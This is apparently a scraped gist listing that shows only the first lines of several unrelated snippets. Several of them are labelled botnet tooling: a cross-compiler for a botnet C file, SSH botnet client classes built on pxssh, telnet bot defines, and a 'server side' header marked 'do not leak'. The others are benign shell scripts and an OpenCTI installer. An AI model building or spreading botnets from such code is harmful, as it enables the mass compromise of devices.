This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Python cross-compiler | |
| #uclibc ever down? No worrys I gottcha fam. | |
| import subprocess, sys | |
| if len(sys.argv[2]) != 0: | |
| ip = sys.argv[2] | |
| else: | |
| print("\x1b[0;31mIncorrect Usage!") | |
| print("\x1b[0;32mUsage: python " + sys.argv[0] + " <BOTNAME.C> <IPADDRESS> \x1b[0m") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # basic ssh botnet | |
| import pxssh #calling pxssh module | |
| class Client: #defining class with name client | |
| def_init_(self,host,user,password): | |
| self.host = host | |
| self.user=user | |
| self.password = password | |
| self.session = self.connect() # for ssh session | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse, pxssh | |
| class Client: | |
| def __init__(self, host, user, password): | |
| self.host = host | |
| self.user = user | |
| self.password = password | |
| self.session = self.connect() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pxssh | |
| class Client: | |
| def __init__(self, host, user, password): | |
| self.host = host | |
| self.user = user | |
| self.password = password | |
| self.session = self.connect() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #|-------------------------------------------------| | |
| #|Before running this script you must have: | | |
| #| figlet -> apt-get install figlet | | |
| #| cowsay -> apt-get install cowsay | | |
| #| toilet -> apt-get install toilet | | |
| #|-------------------------------------------------| | |
| #REMEBER TO ENTER THS TO MAKE THE FIILE EXACUTABLE 'chmod u+x dm.sh' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define PR_SET_NAME 15 | |
| #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *)) | |
| #define PAD_RIGHT 1 | |
| #define PAD_ZERO 2 | |
| #define PRINT_BUF_LEN 12 | |
| #define CMD_IAC 255 | |
| #define CMD_WILL 251 | |
| #define CMD_WONT 252 | |
| #define CMD_DO 253 | |
| #define CMD_DONT 254 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Python auto cross compiler by void | |
| import subprocess, sys | |
| if len(sys.argv[2]) != 0: | |
| ip = sys.argv[2] | |
| else: | |
| print("\x1b[0;31mIncorrect Usage!") | |
| print("\x1b[0;32mUsage: python " + sys.argv[0] + " <BOTNAME.C> <IPADDR> \x1b[0m") | |
| exit(1) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ███╗ ███╗ ██████╗ ██████╗ ███████╗ | |
| ████╗ ████║██╔═══██╗██╔══██╗╚══███╔╝ | |
| ██╔████╔██║██║ ██║██║ ██║ ███╔╝ | |
| ██║╚██╔╝██║██║ ██║██║ ██║ ███╔╝ | |
| ██║ ╚═╝ ██║╚██████╔╝██████╔╝███████╗ | |
| ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ | |
| If you have this you are trusted. Please do not leak! | |
| MODZ SERVER SIDE V1 By DaddyL33T |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # /------------------------------------------\ | |
| # | don't forget to download the .tp file | | |
| # | and place it in the user's directory :› | | |
| # | | | |
| # | also install lolcat: | | |
| # | https://github.com/busyloop/lolcat | | |
| # \------------------------------------------/ | |
| alias test-passed='if [ "$?" -eq "0" ]; then lolcat ~/.tp -a -s 40 -d 2; fi;' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/bash -e | |
| # script: opencti_ubuntu_installer.sh | |
| # purpose: to automate install opencti based on manual deployment below | |
| # process: https://opencti-platform.github.io/docs/installation/manual | |
| # license: Apache 2.0 | |
| # check root ------------------------------------------------------- |